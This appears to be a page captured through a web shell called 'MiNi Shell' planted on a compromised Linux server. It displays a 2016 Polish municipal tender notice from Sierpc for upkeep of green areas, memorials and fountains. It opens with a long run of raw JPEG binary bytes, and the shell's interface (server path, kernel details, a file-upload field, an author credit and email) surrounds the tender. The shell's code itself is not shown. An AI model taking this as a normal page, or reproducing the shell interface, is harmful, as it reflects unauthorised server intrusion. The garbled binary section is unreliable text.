JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160229/44304-N-2016.html

<p class="kh_header"><b>Sierpc: Utrzymanie zieleni i czystości, w tym mogił i  miejsc pamięci narodowej oraz urządzeń małej architektury na terenach zielonych Miasta Sierpca stanowiących własność Gminy Miasto Sierpc od 01.04.2016 roku do 31.03.2017 roku</b><br>
<b>Numer ogłoszenia: 44304 - 2016; data zamieszczenia: 29.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Piastowska 11a, 09-200 Sierpc, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sierpc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni i czystości, w tym mogił i  miejsc pamięci narodowej oraz urządzeń małej architektury na terenach zielonych Miasta Sierpca stanowiących własność Gminy Miasto Sierpc od 01.04.2016 roku do 31.03.2017 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.		Przedmiotem umowy jest utrzymanie zieleni i czystości, w tym mogił i miejsc pamięci narodowej oraz urządzeń małej architektury na terenach zielonych Miasta Sierpca stanowiących własność Gminy Miasto Sierpc.
2.	W szczególności prace polegały będą na:
1)	Skoszeniu trawy wraz z uprzątnięciem części ściętej.
2)	Grabieniu i usuwaniu liści. 
3)	Odchwaszczeniu alejek. 
4)	Pielęgnacja drzew, krzewów oraz żywopłotów,tj.:
a)	usuwanie odrostów w strefie korzeniowej drzew i na misach drzew, 
b)	podcinanie gałęzi drzew, 
c)	docinanie złamanych, suchych gałęzi i konarów wraz z uprzątnięciem części ściętej,
d)	uprzątanie z terenu objętego zamówieniem wiatrołomów, wykrotów, odłamanych konarów i gałęzi.
e)	poprawianie oraz wymianę palików i taśm przy drzewkach, 
f)	przycinanie żywopłotów.
5)	Sadzeniu drzew i krzewów. 
6)	Rozplantowaniu ziemi w wyniku powstania kretowisk.
7)	Przygotowaniu ziemi pod nasadzenia kwiatów.
8)	Obsadzaniu rozstawionych na terenie miasta pojemników, kwietników i gazonów. 
9)	Wykonywaniu nowych rabat, pielęgnacja obsadzonych roślinami kwietnikowymi, i renowacja istniejących, w szczególności pielenie, odchwaszczanie, spulchnianie gleby, zwalczanie chorób i szkodników roślin.
10)	Bieżącym podlewaniu krzewów, kwiatów oraz trawników.
11)	Usuwaniu roślin po zakończeniu wegetacji.
12)	Zakładaniu oraz odnawianiu trawników. 
(W ramach wykonywania w/w usług, Wykonawca ponosi koszty środków ochrony roślin, nawozów, kory, środków chemicznych itp. materiałów niezbędnych do prawidłowego wykonania umowy. Zamawiający bezpłatnie udostępnia Wykonawcy istniejące zdroje uliczne w celu poboru wody, na potrzeby prawidłowego wykonania przedmiotu zamówienia).

13)	Stałym (łącznie z dniami wolnymi od pracy i świętami) utrzymaniu czystości tj.;
a)	codzienne zbieranie nieczystości (śmieci, butelek, puszek, niedopałków papierosów, odchodów itp.), minimum raz na tydzień zamiatanie schodów przy ul. Narutowicza,
b)	opróżnianie śmietniczek wraz z ich wywozem na składowisko odpadów.
Codzienne zbieranie nieczystości i opróżnianie śmietniczek winno zostać wykonane na terenach zielonych wskazanych w załączniku nr 1 zgodnie ze wskazaniem Wykonawcy w kryterium w formularzu ofertowym .
14)	Umyciu schodów przy ul. Narutowicza.
15)	Utrzymaniu mogił i miejsc pamięci narodowej tj.;
a)	zamiatanie, mycie, i zbieranie nieczystości wraz z ich wywozem na składowisko,
b)	rozstawienie zniczy oraz kwiatów (dostarczonych przez zamawiającego).
16)	Utrzymaniu małej architektury tj.;
a)	umycie ławek,
b)	umycie koszy,
c)	umycie kloszy lamp w parkach.
17)	Utrzymaniu fontann w parku Korczaka (przed sądem) i na skwerku Rodziny Sierpskich (przed pocztą) tj.;
a)	czyszczenie dysz (strumień wody ma być równomierny),
b)	czyszczenie niecki,
c)	uzupełnienie preparatu glonobójczego (z wyłączeniem fontanny w parku Korczaka),
d)	czyszczenie infrastruktury oświetleniowej fontann,
e)	codzienne sprawdzanie stanu wody w fontannach, 
f)	codzienne uprzątnięcie lustra wody z nieczystości, 
g)	przygotowanie fontann do okresu letniego (wyczyszczenie niecek, napuszczenie do nich wody, uzupełnienie preparatu glonobójczego, montaż dysz i uruchomienie fontann) w terminie do 15.04 2016 r.,
h)	przygotowanie fontann do okresu zimowego w terminie wyznaczonym przez zamawiającego, nie później niż 31.11.2016 r. (spuszczenie wody z niecki fontann, czyszczenie oraz wysuszenie niecki fontann, demontaż oraz wyczyszczenie dysz i złączy do dysz fontann, spuszczenie wody z instalacji). 
(Wykonanie czynności związanych z utrzymaniem fontann winno zostać przeprowadzone w porze nocnej lub wczesnych godzinach rannych, najpóźniej do godziny 8.00. Zamawiający na każde żądanie Wykonawcy udostępnia dokumentację DTR dla fontann).
Szczegółowy opis przedmiotu zamówienia zawarty jest w OPZ - Załącznik nr 1 do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość rozszerzenia zakresu zamówienia podstawowego o zamówienie uzupełniające, polegające na powtórzeniu tego samego rodzaju robót i nie przekraczające 50% jego wartości</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.31.41.00-5, 77.31.40.00-4, 77.31.00.00-6, 77.34.00.00-5, 90.51.13.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferty powinny być zabezpieczona wadium w wysokości 4000 złotych (słownie: cztery tysiące złotych  00/100).
Wadium może być wniesione w formie:
- pieniądza - wpłaca się przelewem z konta Wykonawcy na konto Zamawiającego	
Bank Pekao S.A. I/O Sierpc 84 1240 3204 1111 0000 2905 2796;
- poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancji bankowych;
- gwarancji ubezpieczeniowych;
- poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 poz.1804, z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.2.1.	w zakresie spełniania warunku, żąda się posiadania zezwolenia do zbierania i transportu odpadów powstałych w wyniku świadczenia usług, wydanego na podstawie ustawy o odpadach (Dz. U. z 2013r., poz.21 z późn. zmianami),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie spełniania warunku, żąda się zrealizowania lub realizowania w ciągu ostatnich 3 lat prac związanych z utrzymaniem oraz pielęgnacją zieleni na łączną kwotę co najmniej 100.000,00 zł brutto;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie spełniania warunku, żąda się dysponowania minimum:
1. jednym ciągnikiem z przyczepą,
2. jedną kosiarka bijakową ciągnikową o szer. koszenia min. 1 m,
3. jedna kosiarka bijakową na wysięgniku o szer. koszenia min. 0,5 m,
4. pięcioma kosiarkami lub wykaszarkami spalinowymi, 
5. jedną dmuchawą do liści, 
6. jednym odkurzacz do liści,
7. jednym odkurzacz do zwierzęcych odchodów,
8. jednym pojazdem o masie do 3,5 ton przystosowanymi do wywozu nieczystości,
9. jednym samochodem ciężarowym o ładowności do 12 ton,
10. jedna myjką ciśnieniową.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie spełniania warunku, żąda się dysponowania:
1. osobami realizującymi przedmiot zamówienia określony w OPZ zatrudnionymi na podstawie umowy o pracę przez wykonawcę lub podwykonawcę,
2. Wykonawca jest zobowiązany do przedłożenia na żądanie Zamawiającego (nie rzadziej niż raz na kwartał) oświadczenia o realizacji przedmiotu zamówienia określonego w §1 umowy przez osoby zatrudnione na umowę o pracę, którego wzór stanowi załącznik Nr 3 do umowy i zaświadczenie z ZUS potwierdzające treść złożonego oświadczenia,
3. Zmiana deklarowanego składu osobowego pracowników wykonujących czynności określone w § 1 umowy wymaga zawiadomienia Zamawiającego w terminie do 7 dni od zaistnienia zmian. Zaistniała okoliczność nie wymaga zmian w treści umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie spełniania warunku,. żąda się posiadanie ubezpieczenia wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z realizacją przedmiotu zamówienia na kwotę nie mniejszą niż 150.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - godziny zebrania nieczystości z terenów zielonych - 6</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza możliwość dokonania zmian w umowie w następujących przypadkach:
1. przedłużenia lub skrócenia sezonu letniego w związku z wystąpieniem anomalnych warunków atmosferycznych,
2.wystąpienie zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
3. wystąpienie siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem,
4. zmiana danych teleadresowych Wykonawcy,
5. zmiana obowiązującej stawki podatku VAT.
6. Warunki dokonania zmian Umowy:
zasady inicjowania zmiany:
1. wniosek Zamawiającego o dokonanie zmiany,
2. wniosek Zamawiającego, aby Wykonawca przedłożył propozycje zmiany,
3. wniosek Wykonawcy.
7. wniosek zmiany powinien zawierać:
- opis zmiany,
- uzasadnienie zmiany potwierdzające, że proponowana zmiana ma na celu usprawnienie usług i/lub wynika ze zmian związanych z finansowaniem zamówienia na usługi lub warunki jej dokonania określono w innych ustaleniach umowy,
- koszt zmiany i sposób jego obliczenia - wpływ zmiany na wysokość wynagrodzenia,
- czas wykonania zmiany - wpływ zmiany na termin zakończenia Umowy.
8. Wykonawca nie będzie uprawniony do żadnego zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem Umowy przez Wykonawcę. W takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sierpc.pl/index.jsp?bipkod=/004<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sierpcu
ul. Piastowska 11a
09-200 Sierpc.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2016 godzina 10:00, miejsce: Urząd Miejski w Sierpcu
ul. Piastowska 11a
09-200 Sierpc
w sekretariacie Zamawiającego (pokój 12).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com